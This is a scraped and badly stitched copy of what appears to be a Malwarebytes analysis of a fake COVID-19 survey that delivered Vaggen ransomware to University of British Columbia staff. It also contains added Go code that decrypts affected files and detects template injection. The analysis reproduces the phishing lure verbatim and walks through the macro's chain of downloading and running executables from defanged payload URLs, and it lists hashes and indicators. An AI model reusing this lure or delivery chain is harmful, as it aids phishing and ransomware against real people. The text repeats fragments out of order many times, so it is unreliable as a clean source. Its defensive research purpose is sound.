3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3318 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted on a particular event.\r\nThis can be very useful as an early-warning system that an intruder has gained access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption routine is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom, and the file content is encrypted with the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises further questions about the motivation behind this phishing attack.
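The file recovery the Vaggen ransomware section above describes (AES-256-GCM with the hardcoded key, the file laid out as 12-byte nonce, encrypted content, 16-byte tag), written out as an added Go example; this is not the malware's code nor the authors' tooling. The sample file and the fixed sampleNonce are constructed here so the routine can be checked offline, whereas the real nonce came from CryptGenRandom per file.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Layout of a .VAGGEN file as the write-up describes it:
// [12-byte nonce][encrypted content][16-byte GCM tag].
const (
	nonceLen = 12
	tagLen   = 16
)

// vaggenKey is the 32-byte (AES-256) key quoted in the write-up.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// sampleNonce is a constructed, fixed 12-byte nonce so the example is
// reproducible; the real malware drew a fresh nonce per file from CryptGenRandom.
var sampleNonce = []byte("constructed!")

// recoverVaggen reverses the encryption the write-up describes: split the
// nonce off the front of the file, then AES-256-GCM Open the rest. Open
// verifies the trailing 16-byte tag before releasing any plaintext, so a wrong
// key or a damaged file yields an error instead of garbage output.
func recoverVaggen(key, file []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("AES-256 needs a 32-byte key, got %d bytes", len(key))
	}
	// A file shorter than nonce+tag cannot be a gcm.Seal output; refuse it
	// rather than slicing out of range (partially written files look like this).
	if len(file) < nonceLen+tagLen {
		return nil, fmt.Errorf("file too short (%d bytes) to hold nonce and tag", len(file))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // default GCM: 12-byte nonce, 16-byte tag
	if err != nil {
		return nil, err
	}
	nonce, sealed := file[:nonceLen], file[nonceLen:]
	plaintext, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, errors.New("GCM tag check failed: wrong key or damaged file")
	}
	return plaintext, nil
}

// makeConstructedSample produces a test vector in the same layout using the
// standard library's gcm.Seal with an explicit nonce. It exists only so the
// recovery routine can be exercised offline; it is not the malware's code.
func makeConstructedSample(key, nonce, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	// Seal appends to dst; passing a copy of the nonce as dst gives
	// nonce || ciphertext || tag, which is the .VAGGEN layout.
	return gcm.Seal(append([]byte{}, nonce...), nonce, plaintext, nil), nil
}

func main() {
	original := []byte("constructed sample: contents of a victim spreadsheet")
	sealed, err := makeConstructedSample(vaggenKey, sampleNonce, original)
	if err != nil {
		panic(err)
	}
	got, err := recoverVaggen(vaggenKey, sealed)
	if err != nil {
		panic(err)
	}
	fmt.Println("recovered plaintext matches:", bytes.Equal(got, original))

	// A single flipped ciphertext byte is caught by the tag, not silently decrypted.
	damaged := append([]byte{}, sealed...)
	damaged[nonceLen] ^= 0x01
	_, err = recoverVaggen(vaggenKey, damaged)
	fmt.Println("damaged file rejected:", err != nil)
}
```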
When the macro is executed, it does the following:
Gets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to see whether it succeeded (on success, the return value is the task ID of the launched application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. 
A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).
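A defender-side check for the template injection described above, as an added Go example that is not from the write-up or its authors: it opens a .docx as a zip and reports any attachedTemplate relationship whose target is external, which is the hook through which a remote template such as template.dotm is loaded when the document opens. The two sample documents are constructed inside the block, and the placeholder URL stands in for the real template location, which this page does not give.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// A .docx is a zip. A document built for template injection carries, in
// word/_rels/settings.xml.rels, an attachedTemplate relationship whose
// TargetMode is External: Word fetches that target when the file is opened.
const relsPath = "word/_rels/settings.xml.rels"
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// remoteTemplates returns every external attachedTemplate target found in
// the document, i.e. the remote template URLs it would load. A local
// template path (TargetMode absent) is normal and is not reported.
func remoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a zip/docx: %w", err)
	}
	for _, f := range zr.File {
		if f.Name != relsPath {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("malformed %s: %w", relsPath, err)
		}
		var found []string
		for _, r := range rels.Rels {
			if r.Type == attachedTemplateType && strings.EqualFold(r.TargetMode, "External") {
				found = append(found, r.Target)
			}
		}
		return found, nil
	}
	return nil, nil // no settings relationships part: nothing to report
}

// buildConstructedDocx writes a minimal zip holding only the relationships
// part, so the check can run offline. Real documents have many more parts.
func buildConstructedDocx(target, mode string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, err := zw.Create(relsPath)
	if err != nil {
		panic(err)
	}
	fmt.Fprintf(w, `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="%s"/>
</Relationships>`, attachedTemplateType, target, mode)
	zw.Close()
	return buf.Bytes()
}

func main() {
	// Constructed samples; the placeholder URL stands in for the real
	// notabug.org path, which the write-up does not give for the template.
	samples := []struct {
		name string
		doc  []byte
	}{
		{"injected", buildConstructedDocx("https://example.invalid/raw/master/template.dotm", "External")},
		{"benign", buildConstructedDocx("Normal.dotm", "")},
	}
	for _, s := range samples {
		urls, err := remoteTemplates(s.doc)
		fmt.Printf("%s: remote templates=%v err=%v\n", s.name, urls, err)
	}
}
```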
Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3357 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3358 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, thanks to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and DropBox and used the share functionality of these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. By comparison, it is much more difficult to detect spam sent through file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the VBA Shell function to execute killar.exe\r\nChecks the return value of the Shell call to determine whether it succeeded (on success, the return value is the task ID of the launched application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event. This can be very useful as an early warning system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is implemented as the callback of the standard Go function filepath.Walk (package path/filepath).\r\nFiles are encrypted with AES-256 (32-byte key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code (32 characters, matching the AES-256 key size) is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\n
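The .VAGGEN layout described in the Vaggen ransomware section (12-byte nonce, AES-256-GCM ciphertext, 16-byte tag, one hardcoded key) is what makes recovery possible without paying. The Go program below is an added example written for this page, not code from the Malwarebytes post or from the malware: it parses that layout, decrypts a file with the reported key, and rejects a wrong key, a damaged file or a truncated file. The function names and the sample plaintext are assumptions; the fixture builder exists only so the example runs offline.

```go
// Added example for this page, not code from the Malwarebytes post or the malware:
// parse the .VAGGEN layout (nonce || ciphertext || GCM tag) and recover the content.
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

const (
	vaggenNonceSize = 12 // 12-byte nonce prepended to the file
	vaggenTagSize   = 16 // 16-byte GCM tag appended to the file
)

// The hardcoded key quoted in the analysis; 32 bytes, so AES-256.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

// ParseVaggen splits a .VAGGEN file into nonce, ciphertext and tag without
// decrypting anything. Files too short to hold a nonce and a tag are rejected.
func ParseVaggen(blob []byte) (nonce, ciphertext, tag []byte, err error) {
	if len(blob) < vaggenNonceSize+vaggenTagSize {
		return nil, nil, nil, fmt.Errorf("vaggen: file too short (%d bytes)", len(blob))
	}
	nonce = blob[:vaggenNonceSize]
	ciphertext = blob[vaggenNonceSize : len(blob)-vaggenTagSize]
	tag = blob[len(blob)-vaggenTagSize:]
	return nonce, ciphertext, tag, nil
}

// DecryptVaggen recovers the original file content with the given 32-byte key.
// gcm.Open checks the tag before releasing any plaintext, so a wrong key or a
// damaged file produces an error instead of silently writing garbage to disk.
func DecryptVaggen(key, blob []byte) ([]byte, error) {
	if len(key) != 32 {
		return nil, errors.New("vaggen: key must be 32 bytes (AES-256)")
	}
	nonce, _, _, err := ParseVaggen(blob)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block) // standard GCM: 12-byte nonce, 16-byte tag
	if err != nil {
		return nil, err
	}
	// Everything after the nonce is ciphertext||tag, which is what gcm.Open expects.
	plaintext, err := gcm.Open(nil, nonce, blob[vaggenNonceSize:], nil)
	if err != nil {
		return nil, fmt.Errorf("vaggen: authentication failed (wrong key or damaged file): %w", err)
	}
	return plaintext, nil
}

// MakeSampleVaggen builds a constructed fixture in the same layout so the example
// runs offline: gcm.Seal with the nonce as destination prefix yields
// nonce || ciphertext || tag, matching the structure described in the analysis.
func MakeSampleVaggen(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

func main() {
	original := []byte("constructed sample: quarterly report draft") // constructed content
	blob, err := MakeSampleVaggen(vaggenKey, original)
	if err != nil {
		panic(err)
	}
	nonce, ct, tag, _ := ParseVaggen(blob)
	fmt.Printf("nonce=%d ciphertext=%d tag=%d bytes\n", len(nonce), len(ct), len(tag))

	recovered, err := DecryptVaggen(vaggenKey, blob)
	fmt.Println("correct key recovers content:", err == nil && bytes.Equal(recovered, original))

	_, err = DecryptVaggen(bytes.Repeat([]byte("x"), 32), blob)
	fmt.Println("wrong key rejected:", err != nil)
}
```

For a real recovery run, read each .VAGGEN file into blob, write the result of DecryptVaggen to a new file, and only then consider removing the encrypted copy, since an authentication error means the output must not be trusted.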
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3372 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3373 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3374 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. 
It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3375 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3376 of 
